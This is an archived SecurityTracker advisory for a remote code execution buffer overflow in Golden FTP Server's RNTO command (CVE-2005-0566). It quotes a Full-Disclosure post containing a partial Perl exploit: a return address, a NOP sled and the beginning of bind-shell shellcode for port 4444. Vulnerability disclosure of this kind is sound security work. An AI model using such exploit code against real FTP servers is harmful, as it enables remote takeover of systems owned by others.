Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (File Transfer/Sharing)  >   Golden FTP Server Vendors:   KMiNT21 Software
Golden FTP Server Buffer Overflow in RNTO Command Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1012973
SecurityTracker URL:
CVE Reference:   CVE-2005-0566   (Links to External Site)
Updated:  Feb 28 2005
Original Entry Date:  Jan 24 2005
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): prior to 2.05b
Description:   A vulnerability was reported in Golden FTP Server. A remote user can execute arbitrary code.

Barabas reported that a remote user can send a specially crafted RNTO command to execute arbitrary code on the target server.

Impact:   A remote user can execute arbitrary code on the target system with the privileges of the target FTP service.
Solution:   The vendor has released a fixed version (2.05b), available at:

Vendor URL: (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  [Full-Disclosure] several BO's in goldenftpd

For the millions that use this ftp server:

It has numerous cool features, like no authentication whatsoever,
typos in error messages, buffer overflows etc...
I just opened it up when my dog jumped on the keyboard and
accidentally send a specially crafted packet to localhost and..BAM...a
shell on port 4444.
Luckily I had ethereal running and here it is:
Oh yeah, vendor notified and fixed it (hopefully, didnt check)

#!/usr/bin/perl -w
# Barabas - -
# cheers to muts and all peeps at WH.
# XPSP2 goldenftpserver sploit - bind 4444

use strict;
use Net::FTP;
my $payload="\x41"x260;
$payload .="\x65\x82\xa5\x7c";#jmpesp
$payload .="\x90"x32;#not really necessary...blah
# win32_bind -  EXITFUNC=seh LPORT=4444 Size=321 Encoder=None
$payload .="\xfc\x6a\xeb\x4f\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".

my $ftp = Net::FTP->new("", Debug => 1);
Full-Disclosure - We believe in it.


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, LLC